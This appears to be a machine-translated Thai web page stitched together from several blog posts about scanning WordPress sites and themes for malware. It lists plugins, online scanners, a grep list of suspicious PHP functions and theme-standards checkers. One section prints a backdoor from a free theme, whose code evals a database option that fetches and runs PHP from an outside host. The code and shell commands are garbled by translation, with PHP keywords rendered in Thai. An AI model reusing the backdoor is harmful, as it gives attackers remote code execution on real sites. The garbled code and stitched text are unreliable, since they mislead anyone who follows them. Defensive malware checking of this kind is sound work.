WordPress เป็นเครื่องมือยอดนิยมสำหรับการสร้างเว็บไซต์และบล็อกข้อมูลต่างๆ ความปลอดภัยของเว็บไซต์ของคุณเป็นมากกว่าความปลอดภัยของข้อมูลของคุณ สิ่งนี้สำคัญกว่ามาก เนื่องจากเป็นความปลอดภัยของผู้ใช้ทุกคนที่อ่านและเชื่อถือทรัพยากรของคุณ ด้วยเหตุนี้จึงเป็นเรื่องสำคัญมากที่ไซต์จะต้องไม่ติดไวรัสหรือโค้ดที่เป็นอันตรายอื่นๆ

เราจะดูวิธีป้องกัน WordPress จากการแฮ็กในบทความต่อไปนี้ แต่ตอนนี้ฉันต้องการบอกวิธีตรวจสอบเว็บไซต์ WordPress เพื่อหาไวรัสและโค้ดที่เป็นอันตรายเพื่อให้แน่ใจว่าทุกอย่างปลอดภัย

ตัวเลือกแรกที่นึกถึงคือ คุณถูกแฮ็กโดยแฮกเกอร์ และสร้างแบ็คดอร์ของพวกเขาไว้ในโค้ดของเว็บไซต์ของคุณ เพื่อให้สามารถส่งสแปม ใส่ลิงก์ และสิ่งเลวร้ายอื่น ๆ ได้ สิ่งนี้เกิดขึ้นบางครั้ง แต่เป็นกรณีที่ค่อนข้างหายากหากคุณอัปเดตซอฟต์แวร์ตรงเวลา

มีธีม WordPress ฟรีและปลั๊กอินต่าง ๆ มากมายและนี่อาจเป็นภัยคุกคามอยู่แล้ว มันเป็นสิ่งหนึ่งเมื่อคุณดาวน์โหลดเทมเพลตจากไซต์ WordPress และอีกสิ่งหนึ่งเมื่อคุณพบมันบนไซต์ด้านซ้าย นักพัฒนาที่ไร้ศีลธรรมสามารถฝังโค้ดที่เป็นอันตรายต่างๆ ลงในผลิตภัณฑ์ของตนได้ ความเสี่ยงจะยิ่งเพิ่มมากขึ้นหากคุณดาวน์โหลดเทมเพลตพรีเมียมฟรี โดยที่แฮกเกอร์สามารถเพิ่มช่องโหว่ด้านความปลอดภัยบางประเภทโดยไม่ต้องเสี่ยงใดๆ ซึ่งพวกเขาสามารถเจาะทะลุและทำสิ่งที่พวกเขาต้องการได้ นี่คือเหตุผลว่าทำไมการตรวจสอบไซต์ WordPress เพื่อหาไวรัสจึงมีความสำคัญมาก

ตรวจสอบไซต์ WordPress เพื่อหาไวรัส

สิ่งแรกที่คุณต้องมองหาเมื่อตรวจสอบไซต์เพื่อหาไวรัสคือ ปลั๊กอิน WordPress- คุณสามารถสแกนเว็บไซต์ของคุณได้อย่างรวดเร็วและง่ายดายและค้นหาส่วนโค้ดที่น่าสงสัยซึ่งควรค่าแก่การใส่ใจ ไม่ว่าจะอยู่ในธีม ปลั๊กอิน หรือแกนหลักของ Wodpress ก็ตาม ลองดูปลั๊กอินยอดนิยมบางส่วน:

1.ตค

ปลั๊กอินที่เรียบง่ายนี้จะตรวจสอบธีมทั้งหมดที่ติดตั้งบนเว็บไซต์ของคุณเพื่อดูว่ามีโค้ดที่เป็นอันตรายหรือไม่ ปลั๊กอินตรวจพบลิงก์ที่ซ่อนอยู่ซึ่งเข้ารหัสโดยใช้การแทรกโค้ด base64 และยังแสดงอีกด้วย ข้อมูลรายละเอียดเกี่ยวกับปัญหาที่พบ ส่วนใหญ่แล้วชิ้นส่วนของโค้ดที่พบไม่ใช่ไวรัส แต่อาจเป็นอันตรายได้ ดังนั้นคุณควรใส่ใจกับชิ้นส่วนเหล่านั้น

เปิด "รูปร่าง" -> “แทค”จากนั้นรอจนกว่าจะตรวจสอบหัวข้อทั้งหมด

2. เครื่องสแกนวีไอพี

คล้ายกับเครื่องสแกนหัวข้อ TOC มาก แต่แสดงข้อมูลโดยละเอียดมากขึ้น ความสามารถในการตรวจจับลิงก์เดียวกัน รหัสที่ซ่อนอยู่และส่วนแทรกที่เป็นอันตรายอื่นๆ เพียงเปิดรายการ VIP Scanner ในส่วนเครื่องมือแล้ววิเคราะห์ผลลัพธ์

คงจะพอถอนออกได้. ไฟล์พิเศษเช่น desktop.ini หรือคุณต้องดูรายละเอียดเพิ่มเติมว่าเกิดอะไรขึ้นในไฟล์ที่ใช้ base64

3. ป้องกันมัลแวร์จาก GOTMLS.NET

ปลั๊กอินนี้ช่วยให้คุณไม่เพียงแต่สแกนธีมและแกนหลักของไซต์เพื่อหาไวรัสเท่านั้น แต่ยังช่วยปกป้องไซต์จากรหัสผ่านที่ดุร้ายและการโจมตี XSS, SQLInj ต่างๆ การค้นหาจะดำเนินการตามลายเซ็นและช่องโหว่ที่ทราบ ช่องโหว่บางอย่างสามารถแก้ไขได้บนเว็บไซต์ หากต้องการเริ่มสแกนไฟล์ ให้เปิด "ต่อต้านมัลแวร์"ในเมนูด้านข้างแล้วคลิก "เรียกใช้การสแกน":

ก่อนที่คุณจะสามารถรันการสแกนได้ คุณจะต้องอัพเดตฐานข้อมูลลายเซ็นของคุณเสียก่อน

4. เวิร์ดเฟนซ์

นี่เป็นหนึ่งในปลั๊กอินยอดนิยมสำหรับการรักษาความปลอดภัย WordPress และการสแกนมัลแวร์ นอกจากเครื่องสแกนที่สามารถค้นหาบุ๊กมาร์กส่วนใหญ่ได้แล้ว รหัสเวิร์ดเพรสมีการป้องกันอย่างต่อเนื่องจาก ประเภทต่างๆการโจมตีและรหัสผ่านกำลังดุร้าย ในระหว่างการค้นหา ปลั๊กอินจะค้นหา ปัญหาที่เป็นไปได้ด้วยปลั๊กอินและธีมต่างๆ รายงานความจำเป็นในการอัปเดต WordPress

เปิดแท็บ "WPDefence"ในเมนูด้านข้างแล้วไปที่แท็บ "สแกน"และกด "เริ่มสแกน":

การสแกนอาจใช้เวลา เวลาที่แน่นอนแต่เมื่อเสร็จสิ้น คุณจะเห็นรายงานโดยละเอียดเกี่ยวกับปัญหาที่พบ

5. แอนติไวรัส

นี่เป็นปลั๊กอินง่ายๆ อีกตัวที่จะสแกนเทมเพลตเว็บไซต์ของคุณเพื่อหาโค้ดที่เป็นอันตราย ข้อเสียคือสแกนเฉพาะเทมเพลตปัจจุบันเท่านั้น แต่ข้อมูลจะแสดงรายละเอียดเพียงพอ คุณจะเห็นฟังก์ชั่นอันตรายทั้งหมดที่อยู่ในธีม จากนั้นคุณสามารถวิเคราะห์รายละเอียดได้ว่าฟังก์ชั่นเหล่านั้นก่อให้เกิดอันตรายหรือไม่ ค้นหารายการ “แอนติไวรัส”ในการตั้งค่าแล้วคลิก "สแกนเทมเพลตธีมทันที":

6. ตัวตรวจสอบความสมบูรณ์

ขอแนะนำให้ตรวจสอบความสมบูรณ์ด้วย ไฟล์เวิร์ดเพรสในกรณีที่ไวรัสได้ลงทะเบียนที่ไหนสักแห่งแล้ว คุณสามารถใช้ปลั๊กอิน Integrity Checker สำหรับสิ่งนี้ จะตรวจสอบไฟล์คอร์ ปลั๊กอิน และเทมเพลตทั้งหมดเพื่อดูการเปลี่ยนแปลง เมื่อสิ้นสุดการสแกน คุณจะเห็นข้อมูลเกี่ยวกับไฟล์ที่เปลี่ยนแปลง

บริการออนไลน์

นอกจากนี้ยังมีบริการออนไลน์หลายอย่างที่ให้คุณตรวจสอบไวรัสบนไซต์ WordPress หรือตรวจสอบเฉพาะเทมเพลต นี่คือบางส่วนของพวกเขา:

themecheck.org- คุณดาวน์โหลดไฟล์เก็บถาวรธีมและสามารถดูคำเตือนทั้งหมดเกี่ยวกับฟังก์ชันที่เป็นอันตรายที่อาจเกิดขึ้นได้ คุณไม่เพียงสามารถดูข้อมูลเกี่ยวกับธีมของคุณเท่านั้น แต่ยังรวมถึงธีมอื่น ๆ ที่อัพโหลดโดยผู้ใช้รายอื่นด้วย รุ่นที่แตกต่างกันหัวข้อ ไม่ว่าปลั๊กอินจะพบอะไรก็ตามในเว็บไซต์นี้ การตรวจสอบ ธีมเวิร์ดเพรสก็มีความสำคัญมากเช่นกัน

virustotal.com- แหล่งข้อมูลที่รู้จักกันดีซึ่งคุณสามารถตรวจสอบไวรัสในเว็บไซต์หรือไฟล์เทมเพลตของคุณได้

ReScan.pro- สแกนไซต์ WordPress เพื่อหาไวรัสโดยใช้บริการนี้ฟรี ดำเนินการวิเคราะห์แบบคงที่และไดนามิกเพื่อตรวจจับการเปลี่ยนเส้นทางที่เป็นไปได้ ตรวจสอบไซต์กับบัญชีดำต่างๆ

sitecheck.sucuri.net- บริการง่ายๆ สำหรับการสแกนไซต์และหัวข้อเพื่อหาไวรัส มีปลั๊กอินสำหรับ WordPress ตรวจจับลิงก์และสคริปต์ที่เป็นอันตราย

ตรวจสอบด้วยตนเอง

ไม่มีอะไรจะดีไปกว่าการตรวจสอบด้วยตนเอง Linux มียูทิลิตี้ grep ที่ยอดเยี่ยมที่ช่วยให้คุณสามารถค้นหาสตริงที่ต้องการในโฟลเดอร์ที่มีไฟล์ได้ ยังคงต้องเข้าใจว่าเราจะมองหาอะไร:

eval - ฟังก์ชั่นนี้ช่วยให้คุณดำเนินการตามอำเภอใจ รหัส PHPมันไม่ได้ถูกใช้โดยผลิตภัณฑ์ที่เคารพตนเอง หากปลั๊กอินหรือธีมตัวใดตัวหนึ่งใช้ฟังก์ชันนี้ โดยมีโอกาสเกือบหนึ่งร้อยเปอร์เซ็นต์ที่เราสามารถพูดได้ว่ามีไวรัสอยู่ที่นั่น

• base64_decode- ฟังก์ชั่นการเข้ารหัสสามารถใช้ร่วมกับ eval เพื่อซ่อนโค้ดที่เป็นอันตรายได้ แต่ก็สามารถใช้เพื่อจุดประสงค์ทางสันติได้เช่นกัน ดังนั้นควรระมัดระวัง
• sha1- วิธีอื่นในการเข้ารหัสโค้ดที่เป็นอันตราย
• gzinflate- ฟังก์ชั่นการบีบอัด เป้าหมายเดียวกัน พร้อมด้วย eval เช่น gzinflate(base64_decode(code);
• สเตรฟ- เปลี่ยนบรรทัดไปข้างหลังอย่างที่ไม่เคยเป็นมาก่อน เนื่องจากสามารถใช้ตัวเลือกสำหรับการเข้ารหัสแบบดั้งเดิมได้
• พิมพ์- ส่งข้อมูลไปยังเบราว์เซอร์ร่วมกับ gzinflate หรือ base64_decode เป็นอันตราย
• file_put_contents- WordPress เองหรือปลั๊กอินยังคงสามารถสร้างไฟล์ในระบบไฟล์ได้ แต่ถ้าธีมทำเช่นนี้ คุณควรระวังและตรวจสอบว่าทำไมมันถึงทำเช่นนี้ เนื่องจากสามารถติดตั้งไวรัสได้
• file_get_contents- ในกรณีส่วนใหญ่ใช้เพื่อจุดประสงค์ทางสันติ แต่สามารถใช้เพื่อดาวน์โหลดโค้ดที่เป็นอันตรายหรืออ่านข้อมูลจากไฟล์
• ขด- เรื่องเดียวกัน
• โฟเพน- เปิดไฟล์เพื่อเขียนคุณไม่มีทางรู้ว่ามีจุดประสงค์อะไร
• ระบบ- ฟังก์ชั่นดำเนินการคำสั่งใน ระบบลินุกซ์หากธีม ปลั๊กอิน หรือ WordPress ทำเช่นนี้ เป็นไปได้มากว่าจะมีไวรัส
• ซิมลิงค์- สร้างลิงก์สัญลักษณ์ในระบบบางทีไวรัสอาจพยายามสร้างลิงก์หลัก ระบบไฟล์เข้าถึงได้จากภายนอก
• สำเนา- คัดลอกไฟล์จากที่หนึ่งไปอีกที่หนึ่ง
• รับ- ส่งคืนชื่อของไดเร็กทอรีการทำงานปัจจุบัน
• ฝูงชน- เปลี่ยนโฟลเดอร์การทำงานปัจจุบัน
• ini_get- รับข้อมูลเกี่ยวกับการตั้งค่า PHP มักมีจุดประสงค์เพื่อสันติ แต่คุณไม่มีทางรู้
• error_reporting(0)- ปิดการใช้งานข้อความแสดงข้อผิดพลาดใด ๆ
• window.top.location.href - ฟังก์ชันจาวาสคริปต์ใช้สำหรับเปลี่ยนเส้นทางไปยังหน้าอื่น
• แฮ็ก- ในกรณีที่เราตรวจสอบ จู่ๆ แฮกเกอร์เองก็ตัดสินใจบอกเรา

คุณสามารถแทนที่แต่ละคำเป็นคำสั่งได้ดังนี้:

grep -R "แฮ็ก" /var/www/path/to/files/wordpress/wp-content/

หรือใช้สคริปต์ง่ายๆ ที่จะค้นหาคำทั้งหมดในครั้งเดียว:

ค่า = "base64_decode (
eval(base64_decode
gzinflate(base64_decode(
getcwd();
สเตรฟ(
ch(อ๊อด(
ฝูงชน
ini_get
window.top.location.href
สำเนา(
ประเมิน(
ระบบ(
ซิมลิงค์(
error_reporting(0)
พิมพ์
file_get_contents(
file_put_contents(
โฟเพน(
แฮ็ก"

ซีดี /var/www/path/to/files/wordpress/wp-content/
$ fgrep -nr -- รวม \*.php "$values" *

สวัสดีเพื่อนๆ. คุณแน่ใจหรือไม่ว่าเทมเพลต WordPress ฟรีที่คุณใช้สำหรับเว็บไซต์และบล็อกของคุณปลอดภัยอย่างแท้จริง และไม่มีภัยคุกคามที่ซ่อนอยู่หรือโค้ดที่เป็นอันตราย คุณแน่ใจเกี่ยวกับเรื่องนี้อย่างสมบูรณ์หรือไม่? อย่างแน่นอน?)

คุณคิดว่าคุณใช้งานเทมเพลตผ่าน ลบลิงก์ที่ซ่อนไว้ออก และงานก็เสร็จสิ้น คุณสแกนไฟล์ของไซต์ด้วยโปรแกรมป้องกันไวรัสเป็นระยะๆ ดูเครื่องมือเว็บมาสเตอร์ของ Yandex ในแท็บความปลอดภัย และรู้สึกโล่งใจเมื่อเห็นข้อความที่นั่น: “ ไม่พบโค้ดที่เป็นอันตรายบนไซต์«.

นั่นคือสิ่งที่ฉันก็คิดเช่นกัน ฉันไม่อยากทำให้คุณเสียใจ แต่...

รหัสอันตรายที่ซ่อนอยู่ในเทมเพลต WordPress ฟรี

นี่คือจดหมายที่ฉันได้รับเมื่อสัปดาห์ที่แล้วทางอีเมลจากบริษัทโฮสติ้งของฉัน ล่าสุดพวกเขาได้แนะนำการตรวจสอบไฟล์ไซต์ทั้งหมดเป็นประจำเพื่อค้นหาเนื้อหาที่เป็นอันตรายและพวกเขาก็พบเนื้อหานี้กับฉัน!

ทุกอย่างเริ่มต้นเมื่อฉันไปที่เว็บไซต์ในบ่ายวันหนึ่งและไม่สามารถเปิดใช้งานได้—มีข้อความไม่เหมาะสมปรากฏขึ้นเกี่ยวกับไฟล์ที่ไม่พบนามสกุล php เมื่อเครียดเล็กน้อยฉันก็ไปศึกษาเนื้อหาของโฟลเดอร์กับไซต์บนโฮสติ้งและพบปัญหาทันที - ไฟล์เทมเพลตของฉัน fuctions.php ถูกเปลี่ยนชื่อเป็น function.php.malware ซึ่งดูเหมือนจะบอกเป็นนัยอย่างคลุมเครือ - โปรแกรมป้องกันไวรัสคือ ทำงานที่นี่หรืออะไรทำนองนั้น) เมื่อไปส่งไปรษณีย์แล้วพบรายงานข้างต้นจากโฮสต์

แน่นอนว่าสิ่งแรกที่ฉันทำคือตรวจสอบ ไฟล์นี้ศึกษาเนื้อหาสแกนด้วยแอนตี้ไวรัสทุกประเภทนับสิบ บริการออนไลน์เพื่อตรวจหาไวรัส ฯลฯ — ท้ายที่สุดก็ไม่พบสิ่งใดเลย ทุกคนต่างยืนยันอย่างเป็นเอกฉันท์ว่าไฟล์นั้นปลอดภัยอย่างสมบูรณ์ แน่นอน ฉันแสดงความสงสัยต่อโฮสต์โดยบอกว่าคุณทำบางอย่างผิดพลาด แต่ในกรณีนี้ ฉันขอให้พวกเขาจัดทำรายงานเกี่ยวกับการตรวจพบโค้ดที่เป็นอันตราย

และนี่คือสิ่งที่พวกเขาตอบฉัน

ฉันไปที่ข้อมูล Google เกี่ยวกับรหัสนี้และคิดอย่างจริงจัง ...

วิธีค้นหาโค้ดที่เป็นอันตรายในเทมเพลต

ปรากฎว่านี่เป็นเทคนิคที่ไม่สำคัญอย่างแท้จริงซึ่งช่วยให้ผู้มีส่วนได้เสียส่งข้อมูลไปยังไซต์ของคุณและเปลี่ยนแปลงเนื้อหาของหน้าเว็บโดยที่คุณไม่รู้! หากคุณใช้เทมเพลตฟรีแล้วล่ะก็ ฉันขอแนะนำให้ตรวจสอบfunctions.phpของคุณเพื่อหาโค้ดต่อไปนี้:

add_filter('the_content', '_bloginfo', 10001);
ฟังก์ชั่น _bloginfo($เนื้อหา)(
$ โพสต์ทั่วโลก;
ถ้า(is_single() && ($co=@eval(get_option('blogoption'))) !== false)(
ส่งคืน $co;
) มิฉะนั้นส่งคืน $content;
}

แม้ว่าฉันจะมีความรู้เกี่ยวกับ PHP เพียงเล็กน้อย แต่ก็ชัดเจนว่ามีการสร้างตัวกรองบางตัวซึ่งเชื่อมโยงกับโพสต์และเนื้อหาตัวแปรส่วนกลาง ซึ่งมีหน้าที่ในการแสดงเนื้อหาเฉพาะบนหน้าโพสต์บล็อกเท่านั้น (เงื่อนไข is_single) สงสัยอยู่แล้วใช่ไหม? ทีนี้มาดูกันว่ามันจะออกมาเป็นอย่างไร รหัสนี้บนเว็บไซต์ของเรา

ตัวเลือกบล็อกที่น่าสนใจที่ร้องขอในฐานข้อมูลก็ดูน่าสงสัยเช่นกัน ไปที่ฐานข้อมูลของเรากันดีกว่า ข้อมูลมายเอสคิวแอลและค้นหาตารางที่เรียกว่า wp_options หากคุณไม่ได้เปลี่ยนคำนำหน้า ตารางนั้นจะมีลักษณะเช่นนี้ตามค่าเริ่มต้น และในนั้นเราจะพบบรรทัดที่เราสนใจเรียกว่า blogoption

ช่างสวยงามจริงๆ! เราเห็นตัวเลือกต่อไปนี้

ส่งคืน eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=47&n'));

เหล่านั้น. จากเว็บไซต์บางแห่ง (และเว็บไซต์รัสเซีย) พวกเขากำลังส่งคืนเนื้อหาที่สามารถมีอะไรก็ได้! จำนวนลิงก์ รหัสที่เป็นอันตราย ข้อความที่แก้ไข ฯลฯ ไซต์เองให้ข้อผิดพลาดในการเข้าถึง 403 เมื่อคุณเข้าถึง ซึ่งไม่น่าแปลกใจเลย แน่นอน ฉันลบตัวเลือกนี้ออกจากฐานข้อมูลด้วย

ตามข้อมูลจากเหยื่อ เนื้อหาที่แน่นอนของบทความของคุณมักจะส่งคืนพร้อมการแก้ไขเพียงครั้งเดียว แทนที่จะเป็นจุดใดๆ “” ลิงก์เปิดถูกซ่อนอยู่ในข้อความ! และยังไงก็ตาม ตัวเลือกนี้ถูกเขียนลงฐานข้อมูลเมื่อมีการติดตั้งเทมเพลต จากนั้นโค้ดที่ทำการทำลายตนเองได้สำเร็จ และฉันใช้ชีวิตอยู่กับขยะพวกนี้เป็นเวลาสองปี และไม่มีโปรแกรมป้องกันไวรัสหรือบริการใดตรวจพบมันให้ฉันเลย ภัยคุกคามนี้ตลอดเวลานั้น พูดตามตรง ฉันไม่ได้สังเกตว่าเทคนิคนี้เคยใช้ได้ผลสำหรับฉันหรือไม่ หรือปลั๊กอินความปลอดภัยของฉันบล็อกฟีเจอร์นี้ (หรือบางทีการอัปเดต WordPress ตัวใดตัวหนึ่งปิดช่องโหว่นี้) แต่ก็ยังไม่เป็นที่น่าพอใจ

คุณธรรมเกี่ยวกับชีสฟรี

คุณชอบความซับซ้อนของ “นักแปล” เทมเพลตของเรา (หรือผู้ที่โพสต์ไว้ในแค็ตตาล็อก) อย่างไร นี่ไม่ใช่สำหรับคุณที่จะตัดลิงก์ออกจากส่วนท้าย) น่าเสียดายที่ฉันจำไม่ได้ว่าฉันดาวน์โหลดเทมเพลตมาจากไหนเมื่อนานมาแล้วไม่เช่นนั้นฉันจะเขียนอันที่น่ารักสองสามอันอย่างแน่นอน และถ้าตอนนั้นผมมีประสบการณ์แบบเดียวกับตอนนี้ผมคงไม่ได้ใช้แน่นอน เทมเพลตฟรีหรือทางเลือกสุดท้าย ฉันจะไม่ดาวน์โหลดจากแหล่งที่ไม่รู้จัก!

ง่ายกว่าที่จะซื้อเทมเพลตพรีเมี่ยมอย่างเป็นทางการในราคา 15-20 เหรียญและใช้ชีวิตอย่างสงบสุขโดยรู้ว่าไม่มีช่องโหว่หรือลิงก์ที่เข้ารหัสอยู่ในนั้นและแม้ว่าจะมีช่องโหว่นักพัฒนาจะปล่อยการอัปเดตอย่างแน่นอนซึ่งจะเป็นช่องโหว่เหล่านี้ ปิด. - อย่างไรก็ตาม Artem เพิ่งตีพิมพ์บทความที่เขาพูดถึงเทมเพลตระดับพรีเมียมและยังแจกรหัสส่งเสริมการขายเพื่อรับส่วนลดสุดโหดสำหรับผู้ที่สนใจ)

สวัสดีเพื่อนๆ IdeaFox!

ฉันไม่รู้เกี่ยวกับคุณ แต่ฉันมีปัญหาในการนอนตอนกลางคืน ฉันรู้สึกทรมานกับปัญหาด้านความปลอดภัยของบล็อก ฉันไม่มีแรงอีกแล้ว :-)

ฉันอ่านบล็อกจำนวนมากในหัวข้อนี้และทดสอบปลั๊กอินจำนวนมากที่ช่วยแก้ไขปัญหานี้ และในความคิดเห็นพวกเขาเริ่มถามคำถามเกี่ยวกับหัวข้อการป้องกันไซต์ซึ่งทำให้ฉันเขียนบันทึกนี้

ลองจินตนาการว่าคุณเก็บบล็อก เขียนบทความ ลอง... แล้วไอ้สารเลวก็เข้ามาทำลายเว็บไซต์ของคุณ ฉันคิดว่าคงจะมีความทุกข์มากมาย

ท้ายที่สุดแล้ว บล็อกเกอร์ทั่วไปทุกคนใช้เวลาและความพยายามอย่างมากในการพัฒนาเว็บไซต์ของเขา และสำหรับหลาย ๆ คน การเขียนบล็อกโดยทั่วไปกลายเป็นความหลงใหล... ที่นี่และจนกว่าหากสิ่งนี้เกิดขึ้น :-)

คุณเข้าใจว่าสิ่งนี้สำคัญแค่ไหน

ในที่สุดเรามาทำธุรกิจกันเถอะ :)

สองสามเดือนที่ผ่านมา ฉันได้เขียนบันทึกเกี่ยวกับการแฮ็กไปแล้ว อย่าลืมอ่านมัน แต่เวลาผ่านไปค่อนข้างมากตั้งแต่นั้นมาและฉันก็ใช้มาตรการเพิ่มเติมเพื่อเสริมความแข็งแกร่งในการป้องกันรอบด้าน

ในบันทึกต่อไปนี้ฉันจะกล่าวถึงปัญหานี้โดยละเอียดอย่างแน่นอน (ฉันจำและเขียนเกี่ยวกับการตั้งค่า ISP ด้วย)

3. ตรวจสอบเว็บไซต์ในบริการออนไลน์อื่น ๆ

ดูเหมือนว่าจะมีการแพร่กระจายของบริการดังกล่าว ฉันมีความคิดเห็นที่ชัดเจนว่าหลายคนโง่มากและสร้างขึ้นเพื่อแสดงโฆษณาเท่านั้น

หมอเว็บ

บริษัท DR.Web ทำ การบริการที่ดีเพื่อตรวจสอบเว็บไซต์ออนไลน์ โดยส่วนตัวแล้ว ครั้งหนึ่งเขาเคยช่วยฉันค้นหาการติดไวรัสในบล็อกของเพื่อน (มีโค้ดของบุคคลที่สามในไฟล์ .htaccess)

การตรวจสอบนั้นง่ายมาก ป้อน URL ของคุณและรอผลการตรวจสอบ

โปรแกรมป้องกันไวรัส-alarm.ru

เครื่องสแกนเว็บไซต์อันทรงพลังที่ใช้ฐานข้อมูลแอนตี้ไวรัสมากถึง 43 ฐานข้อมูลจากบริษัทแอนตี้ไวรัสชั้นนำของโลก

ทุกอย่างก็ง่ายมากที่นี่เช่นกัน เราป้อน URL ของเว็บไซต์ของเราและรอผลการสแกนอย่างใจจดใจจ่อ

ฉันรอสิ่งเหล่านี้อยู่

ทุกอย่างสะอาด นอนหลับได้อย่างสงบ :-)

แน่นอนว่าทั้งหมดนี้เป็นสิ่งที่ดี แต่คุณต้องติดตั้งปลั๊กอินสองสามตัวซึ่งจะไม่สร้างความเสียหายให้กับบล็อก WordPress เลย

4. ขอให้โฮสต์ของคุณตรวจสอบไซต์ของคุณ

ความจริงก็คือผู้ให้บริการโฮสต์มีความกังวลเกี่ยวกับปัญหาด้านความปลอดภัยมากกว่าคุณและมีมาตรการรักษาความปลอดภัยที่มีประสิทธิภาพ อีกทั้งยังมีมาตรการป้องกันพิเศษอีกด้วย

นี่คือข่าวที่ฉันมีสำหรับคุณในวันนี้ ต่อไป ฉันจะบอกคุณเกี่ยวกับปลั๊กอินที่ทรงพลังมากซึ่งสามารถปกป้องบล็อก WordPress ของคุณจากการแฮ็กได้อย่างมาก

ฉันทำงานร่วมกับเขามาได้ 2 เดือนแล้วและพอใจกับเขามาก ในขณะที่ฉันคิดออกฉันก็แบนตัวเอง 3 ครั้ง: –) สรุปมีบางอย่างที่จะบอก

ขั้นตอนที่สำคัญที่สุดประการหนึ่งในการสร้างบล็อกคือการเลือกเทมเพลตคุณภาพสูง มีเว็บไซต์มากมายทั้งแบบเสียเงินและฟรี อย่างไรก็ตาม คุณต้องระวังที่นี่ เนื่องจากมีความเป็นไปได้สูงที่จะรับไวรัสพร้อมกับไฟล์ สคริปต์ที่เป็นอันตรายและลิงค์ที่ซ่อนอยู่

แต่ถึงแม้ว่าเทมเพลตจะสะอาดหมดจดในแง่ของความปลอดภัย และคุณพอใจกับการออกแบบ การใช้งาน และฟังก์ชันการทำงานอย่างสมบูรณ์ แต่ก็ไม่ได้หมายความว่าทุกอย่างจะเป็นไปตามลำดับ ธีมจะต้องมีโค้ด HTML และ CSS ที่ถูกต้อง และสอดคล้องกับมาตรฐานทั้งหมด ซีเอ็มเอส เวิร์ดเพรส. แม้แต่ธีมแบบชำระเงินและเทมเพลตแบบกำหนดเองก็ยังมีปัญหากับธีมหลัง

นักพัฒนาเอ็นจิ้นกำลังพัฒนามันอยู่ตลอดเวลา และผู้เขียนเทมเพลตก็ไม่ได้ตามทันเสมอไป โดยใช้ฟังก์ชันที่ล้าสมัยเมื่อสร้างมันขึ้นมา

วันนี้ฉันจะแสดง 2 วิธีในการตรวจสอบธีม WordPress ว่าเป็นไปตามมาตรฐาน เครื่องมือเหล่านี้ใช้เมื่อมีการเพิ่มลงในไดเร็กทอรีอย่างเป็นทางการ https://wordpress.org/themes/

บริการตรวจสอบธีม WordPress และเทมเพลต Joomla ให้เป็นไปตามมาตรฐาน

ThemeCheck.org คือ บริการฟรีซึ่งช่วยให้คุณสามารถตรวจสอบความปลอดภัยและคุณภาพของเทมเพลตสำหรับ CMS WordPress และ Joomla ก่อนที่จะติดตั้งบนเว็บไซต์

หากต้องการตรวจสอบธีม ให้ดาวน์โหลดไฟล์เก็บถาวรจากคอมพิวเตอร์ของคุณโดยคลิกปุ่ม "เลือกไฟล์" บน themecheck.org หากคุณไม่ต้องการให้ผลการสแกนถูกบันทึกไว้ในบริการและพร้อมใช้งานสำหรับผู้ใช้รายอื่น ให้ทำเครื่องหมายที่ “ ลืมข้อมูลที่อัปโหลดหลังจากผลลัพธ์- ตอนนี้คลิกปุ่ม "ส่ง"

เช่น ผมเอาหัวข้อนี้ อินเทอร์เฟซซึ่งฉันดาวน์โหลดจากเว็บไซต์อย่างเป็นทางการ 99 จาก 100 – 0 ข้อผิดพลาดที่สำคัญและคำเตือน 1 ครั้ง นี่เป็นผลลัพธ์ที่ดีมาก

ในการเปรียบเทียบ เทมเพลตบล็อกของฉันได้รับคะแนน 0 (ข้อผิดพลาด 14 รายการและคำเตือน 23 รายการ) ฉันคิดว่าผลลัพธ์สำหรับหลายๆ คนจะไม่แตกต่างกันมากนัก โดยเฉพาะอย่างยิ่งหากหัวข้อนั้นล้าสมัยไปแล้ว หมายเหตุทั้งหมดพร้อมคำอธิบาย ซึ่งระบุไฟล์และบรรทัดที่พบอยู่ในหน้าเดียวกันด้านล่าง

จริงๆ แล้วฉันไม่ค่อยเข้าใจอะไรมากนัก มันจะมีประโยชน์สำหรับผู้เขียนมากกว่า และสำหรับฉันที่จะเปลี่ยนเทมเพลตก็ง่ายกว่าที่จะแก้ไขทุกอย่าง ฉันไม่รู้ว่าเมื่อใดที่ฉันจะตัดสินใจทำเช่นนี้

ที่บ้านมีธีมเว็บ WordPress และ Joomla ที่ทดสอบก่อนหน้านี้ให้เลือกมากมายพร้อมความสามารถในการจัดเรียงตามเวลาที่เพิ่มหรือการจัดอันดับ เมื่อคุณคลิก คุณจะเห็นข้อมูลโดยละเอียดและลิงก์ไปยังเว็บไซต์ของผู้เขียนและหน้าดาวน์โหลด

หากคุณเป็นนักพัฒนาและธีมของคุณใช้งานได้ 100% คุณสามารถแจ้งให้ผู้ใช้ทราบเกี่ยวกับเรื่องนี้ได้โดยการติดตั้งป้ายสถานะพิเศษพร้อมการให้คะแนน

คุณค่าของบริการ ThemeCheck.org ก็คือเว็บมาสเตอร์ทุกคนสามารถใช้มันเพื่อเลือกธีมคุณภาพสูงก่อนที่จะติดตั้งลงในบล็อก

ปลั๊กอินตรวจสอบธีม

ตรวจสอบแล้ว เทมเพลตที่จัดตั้งขึ้นความเข้ากันได้กับมาตรฐาน WordPress ล่าสุดสามารถทำได้โดยใช้ปลั๊กอิน Theme Check ลิงค์ดาวน์โหลด เวอร์ชันล่าสุด: https://wordpress.org/plugins/theme-check/

ฟังก์ชันการทำงานของปลั๊กอินคล้ายกับบริการที่ฉันอธิบายไว้ข้างต้น ไม่มีการตั้งค่าหลังจากนั้น การติดตั้งมาตรฐานและไม่จำเป็นต้องทำการเปิดใช้งาน ขั้นตอนการตรวจสอบ:

1. ไปที่แผงผู้ดูแลระบบไปที่หน้าเมนู “ลักษณะที่ปรากฏ” – “การตรวจสอบธีม”
2. เลือกธีมที่ต้องการจากรายการดรอปดาวน์หากคุณติดตั้งไว้หลายธีม
3. ทำเครื่องหมายที่ช่อง "ระงับข้อมูล" หากคุณไม่ต้องการส่งข้อมูล
4. คลิกปุ่ม "ตรวจสอบ"

ผลลัพธ์จะแสดงในหน้าเดียวกัน

อย่างที่คุณเห็น ธีมมาตรฐาน ยี่สิบสิบมันไม่เหมาะเช่นกัน แต่ตัวอย่างเช่น ยี่สิบสี่ไม่มีข้อผิดพลาด

หลังจากตรวจสอบแล้ว คุณสามารถปิดใช้งานปลั๊กอินได้ หรือดีกว่านั้นคือลบออกทั้งหมดจนกว่าจะถึงครั้งต่อไป

